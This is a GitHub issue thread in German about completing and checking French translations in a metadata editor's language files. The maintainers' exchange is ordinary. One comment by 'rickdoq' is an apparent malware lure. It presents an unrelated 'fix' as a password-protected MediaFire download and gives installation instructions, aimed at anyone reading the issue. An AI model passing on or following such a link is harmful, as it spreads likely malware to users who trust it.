### ISSUE TITLE
Französische Übersetzungen für die noch fehlenden Formgroups einfügen und überprüfen

### ISSUE THREAD

**Issue by McNamara84** [McNamara84/gfz-metadata-editor-msl-v2#8]
- [x] Descriptions, Thesaurus Keywords, Temporal+spacial..., Free Keywords + die von Sprint 4.
- [x] nicht mehr benötigte Tooltips aus lang/fr.php entfernen
- [x] Übersetzungen prüfen?

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by McNamara84** [comment]
@Ali-GeoFZ für die ganzen neuen MSL-Thesauri hast du jetzt ja immer schon Sprachvariablen verwendet und englische sowie deutsche Übersetzungen in den Sprachdateien gespeichert, richtig?

**Comment by McNamara84** [comment]
`en.php` und `de.php` habe ich überarbeitet. Die `fr.php` mache ich mit DeepL fertig, muss aber vorsichtig sein und genau prüfen.

**Comment by Ali-GeoFZ** [comment]
Lieber @McNamara84 , ich habe sie mir noch einmal angesehen und sie scheinen vollständig zu sein.
